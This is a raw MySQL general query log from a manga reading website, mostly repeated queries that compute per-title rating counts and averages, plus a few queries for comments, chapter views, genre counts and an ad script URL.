Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330653778 Quit 330653779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330653779 Quit 330653780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330653780 Quit 330653781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330653781 Quit 330653782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330653782 Quit 330653783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330653783 Quit 330653784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330653784 Quit 330653785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330653785 Quit 330653786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330653786 Quit 330653787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330653787 Quit 330653788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330653788 Quit 330653789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330653789 Quit 330653790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330653790 Quit 330653791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330653791 Quit 330653792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330653792 Quit 330653793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330653793 Quit 330653794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330653794 Quit 330653795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330653795 Quit 330653796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330653796 Quit 330653797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330653797 Quit 330653798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330653798 Quit 330653799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330653799 Quit 330653800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330653800 Quit 330653801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330653801 Quit 330653802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330653802 Quit 330653803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330653803 Quit 330653804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330653804 Quit 330653805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330653805 Quit 330653806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330653806 Quit 330653807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330653807 Quit 330653808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330653808 Quit 330653809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330653809 Quit 330653810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330653810 Quit 330653811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330653811 Quit 330653812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330653812 Quit 330653813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330653813 Quit 330653814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330653814 Quit 330653815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330653815 Quit 330653816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330653816 Quit 330653817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330653817 Quit 330653818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330653818 Quit 330653819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330653819 Quit 330653820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330653820 Quit 330653821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330653821 Quit 330653822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653822 Quit 330653823 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653823 Quit 330653302 Quit 330653824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653824 Query select * FROM comments where manga_id = '121' and parent_id is null order by created desc 330653824 Quit 330653825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653825 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '121' and m.active = 1 330653825 Quit 330653826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653826 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Office%' OR m.genres like '%Romance%' OR m.genres like '%Seinen%' OR m.genres like '%Slice of Life%') group by manga_id ORDER BY sum(view) DESC 330653826 Quit 330653827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653827 Quit 330653828 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330653828 Quit 330653829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330653829 Quit 330653830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653830 Query select * FROM chapters where manga_id = '121' order by created desc limit 1 330653830 Quit 330653831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330653831 Quit 330653832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330653832 Quit 330653833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330653833 Quit 330653834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330653834 Quit 330653835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330653835 Quit 330653836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330653836 Quit 330653837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330653837 Quit 330653838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330653838 Quit 330653839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330653839 Quit 330653840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330653840 Quit 330653841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330653841 Quit 330653842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330653842 Quit 330653843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330653843 Quit 330653844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330653844 Quit 330653845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330653845 Quit 330653846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330653846 Quit 330653847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330653847 Quit 330653848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330653848 Quit 330653849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330653849 Quit 330653850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330653850 Quit 330653851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330653851 Quit 330653852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330653852 Quit 330653853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330653853 Quit 330653854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330653854 Quit 330653855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330653855 Quit 330653856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330653856 Quit 330653857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330653857 Quit 330653858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330653858 Quit 330653859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330653859 Quit 330653860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330653860 Quit 330653861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330653861 Quit 330653862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330653862 Quit 330653863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330653863 Quit 330653864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330653864 Quit 330653865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330653865 Quit 330653866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330653866 Quit 330653867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330653867 Quit 330653868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330653868 Quit 330653869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330653869 Quit 330653870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330653870 Quit 330653871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330653871 Quit 330653872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330653872 Quit 330653873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330653873 Quit 330653874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330653874 Quit 330653875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330653875 Quit 330653876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330653876 Quit 330653877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330653877 Quit 330653878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330653878 Quit 330653879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330653879 Quit 330653880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330653880 Quit 330653881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330653881 Quit 330653882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330653882 Quit 330653883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330653883 Quit 330653884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330653884 Quit 330653885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330653885 Quit 330653886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330653886 Quit 330653887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330653887 Quit 330653888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330653888 Quit 330653889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330653889 Quit 330653890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330653890 Quit 330653891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330653891 Quit 330653892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330653892 Quit 330653893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330653893 Quit 330653894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330653894 Quit 330653895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330653895 Quit 330653896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330653896 Quit 330653897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330653897 Quit 330653898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330653898 Quit 330653899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330653899 Quit 330653900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330653900 Quit 330653901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330653901 Quit 330653902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330653902 Quit 330653903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330653903 Quit 330653904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330653904 Quit 330653905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330653905 Quit 330653906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330653906 Quit 330653907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330653907 Quit 330653908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330653908 Quit 330653909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330653909 Quit 330653910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330653910 Quit 330653911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330653911 Quit 330653912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330653912 Quit 330653913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330653913 Quit 330653914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330653914 Quit 330653915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330653915 Quit 330653916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330653916 Quit 330653917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330653917 Quit 330653918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330653918 Quit 330653919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330653919 Quit 330653920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330653920 Quit 330653921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330653921 Quit 330653922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330653922 Quit 330653923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330653923 Quit 330653924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330653924 Quit 330653925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330653925 Quit 330653926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330653926 Quit 330653927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330653927 Quit 330653928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330653928 Quit 330653929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330653929 Quit 330653930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM 